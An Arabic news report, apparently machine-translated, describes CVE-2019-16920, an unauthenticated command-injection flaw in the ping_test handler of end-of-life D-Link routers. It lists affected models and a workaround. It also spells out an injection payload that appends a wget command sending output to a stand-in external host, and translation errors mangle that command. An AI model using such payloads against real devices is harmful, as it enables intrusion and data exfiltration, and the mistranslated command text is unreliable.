ثغرة أمنية قابلة للاستغلال عن بعد في أجهزة توجيه D-Link

في أجهزة التوجيه اللاسلكية D-Link المحددة ثغرة خطيرة (CVE-2019-16920)، والذي يسمح لك بتنفيذ التعليمات البرمجية عن بعد على جانب الجهاز عن طريق إرسال طلب خاص إلى معالج "ping_test"، الذي يمكن الوصول إليه دون مصادقة.

ومن المثير للاهتمام، وفقًا لمطوري البرامج الثابتة، أن استدعاء "ping_test" يجب أن يتم تنفيذه فقط بعد المصادقة، ولكن في الواقع يتم استدعاؤه على أي حال، بغض النظر عن تسجيل الدخول إلى واجهة الويب. على وجه الخصوص، عند الوصول إلى البرنامج النصي application_sec.cgi وتمرير المعلمة "action=ping_test"، يقوم البرنامج النصي بإعادة التوجيه إلى صفحة المصادقة، ولكنه في نفس الوقت ينفذ الإجراء المرتبط بـ ping_test. لتنفيذ التعليمات البرمجية، تم استخدام ثغرة أمنية أخرى في ping_test نفسها، والتي تستدعي أداة ping المساعدة دون التحقق بشكل صحيح من صحة عنوان IP الذي تم إرساله للاختبار. على سبيل المثال، لاستدعاء الأداة المساعدة wget ونقل نتائج الأمر "echo 1234" إلى مضيف خارجي، ما عليك سوى تحديد المعلمة "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" test.test/?$(صدى 1234)".

ثغرة أمنية قابلة للاستغلال عن بعد في أجهزة توجيه D-Link

وقد تم تأكيد وجود الثغرة رسميًا في النماذج التالية:

  • DIR-655 مع البرنامج الثابت 3.02b05 أو أقدم؛
  • DIR-866L مع البرامج الثابتة 1.03b04 أو أقدم؛
  • DIR-1565 مع البرامج الثابتة 1.01 أو أقدم؛
  • DIR-652 (لا تتوفر معلومات حول إصدارات البرامج الثابتة التي بها مشكلات)

لقد انتهت بالفعل فترة الدعم لهذه النماذج، لذا D-Link قالوالتي لن تقوم بإصدار تحديثات لها للقضاء على الثغرة الأمنية، ولا توصي باستخدامها وتنصح باستبدالها بأجهزة جديدة. كحل بديل للأمان، يمكنك قصر الوصول إلى واجهة الويب على عناوين IP الموثوقة فقط.

واكتشف لاحقًا أن الثغرة كانت أيضًا يؤثر الطرازات DIR-855L، وDAP-1533، وDIR-862L، وDIR-615، وDIR-835، وDIR-825، وخطط إصدار التحديثات غير معروفة بعد.

المصدر: opennet.ru

إضافة تعليق